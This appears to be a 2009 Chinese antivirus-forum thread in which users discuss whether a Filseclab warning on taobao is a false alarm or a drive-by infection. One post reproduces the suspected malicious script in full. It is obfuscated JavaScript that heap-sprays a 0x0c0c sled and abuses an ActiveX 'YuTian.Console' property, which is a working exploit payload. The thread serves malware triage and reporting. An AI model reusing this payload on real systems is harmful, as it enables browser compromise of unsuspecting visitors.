误报还是挂马?

显示全部楼层 · 发表于 2009-4-17 13:13:45

IE进入taobao后费尔包毒~

显示全部楼层 · 发表于 2009-4-17 13:19:58

我的没有报警，有点奇怪

不过费尔的网页防护是很灵敏的，拦下来的就没事了

显示全部楼层 · 发表于 2009-4-17 13:22:03

另外建议把样本上传到样本区，然后在此给出相应链接，谢谢。

显示全部楼层 · 发表于 2009-4-17 13:22:56

还有个现象,同时启动QVOD;安装过QVOD的用户可以试试

显示全部楼层 · 发表于 2009-4-17 13:24:53

发过来试试，还没有试过费尔呢。

显示全部楼层 · 发表于 2009-4-17 13:26:48

楼主，看一下你的病毒库日期，更新到最新再试，看看还会不会再报告，进入网站时应直接输入其域名，不要通过其他网站或者搜索引擎提供的链接进入，这些链接可能将用户导入虚假的网站

[ 本帖最后由 zq127 于 2009-4-17 13:29 编辑 ]

显示全部楼层 · 发表于 2009-4-17 13:28:43

www.taobao.com

样本区链接：http://bbs.kafan.cn/viewthread.php?tid=463108&page=1#pid7382382

非样本区严禁上传样本，以免造成其他会员误点，谢谢。
——中国崛起

[ 本帖最后由中国崛起于 2009-4-17 13:35 编辑 ]

显示全部楼层 · 发表于 2009-4-17 13:33:03

1.我就是直接进的taobao
2.我看过他的代码了,很不正常;

显示全部楼层 · 发表于 2009-4-17 13:38:24

不知道是不是arp的原因

显示全部楼层 · 发表于 2009-4-17 13:38:50

document.writeln("<script language=\"JavaScript\">");
document.writeln("KabasbCMD = unescape(QuadroSCR.replace(\/YT\/g,\"\\x25\\x75\"));");
document.writeln("var YTaiSFma1=\"\\x25\\x75\";");
document.writeln("var YTaiSFma2=\"\\x30\";");
document.writeln("var YTaiSFma3=\"\\x63\";");
document.writeln("var YTaiSFma4=\"\\x30\";");
document.writeln("var YTaiSFma5=\"\\x63\";");
document.writeln("var YTaiSFma6=\"\\x25\\x75\";");
document.writeln("var YTaiSFma7=\"\\x30\";");
document.writeln("var YTaiSFma8=\"\\x63\";");
document.writeln("var YTaiSFma9=\"\\x30\";");
document.writeln("var YTaiSFma10=\"\\x63\";");
document.writeln("var AntiVir = unescape(YTaiSFma1+YTaiSFma2+YTaiSFma3+YTaiSFma4+YTaiSFma5+YTaiSFma6+YTaiSFma7+YTaiSFma8+YTaiSFma9+YTaiSFma10);");
document.writeln("var Norton = 20;");
document.writeln("var DrWeb = Norton + KabasbCMD.length;");
document.writeln("while (AntiVir.length < DrWeb) AntiVir += AntiVir;");
document.writeln("var Brisbane = AntiVir.substring(0,DrWeb);");
document.writeln("var Radeon = AntiVir.substring(0,AntiVir.length - DrWeb);");
document.writeln("while (Radeon.length + DrWeb < 0x40000) Radeon = Radeon + Radeon + Brisbane;");
document.writeln("var Mcafee = new window[\"\\x41\\x72\\x72\\x61\\x79\"]();");
document.writeln("for (i = 0; i < 400; i++){ Mcafee = Radeon + KabasbCMD }");
document.writeln("var Ewido = \'\';");
document.writeln("while (Ewido.length < 32) Ewido = Ewido + unescape(\"\\x25\\x30\\x63\");");
document.writeln("var Agena = \'\';");
document.writeln("Agena = YuTian.Console;");
document.writeln("var feng11 = \"\\x43\"+\"\\x6f\"+\"\\x6e\"+\"\\x73\"+\"\\x6f\"+\"\\x6c\"+\"\\x65\";");
document.writeln("YuTian[feng11] = Ewido;");
document.writeln("var feng12 = \"\\x43\"+\"\\x6f\"+\"\\x6e\"+\"\\x73\"+\"\\x6f\"+\"\\x6c\"+\"\\x65\";");
document.writeln("YuTian[feng12] = Agena;");
document.writeln("var feng13 = \"\\x43\"+\"\\x6f\"+\"\\x6e\"+\"\\x73\"+\"\\x6f\"+\"\\x6c\"+\"\\x65\";");
document.writeln("YuTian[feng13] = Ewido;");
document.writeln("var feng14 = \"\\x43\"+\"\\x6f\"+\"\\x6e\"+\"\\x73\"+\"\\x6f\"+\"\\x6c\"+\"\\x65\";");
document.writeln("YuTian[feng14] = Agena;");
document.writeln("<\/script>");

[费尔] 误报还是挂马?

本帖子中包含更多资源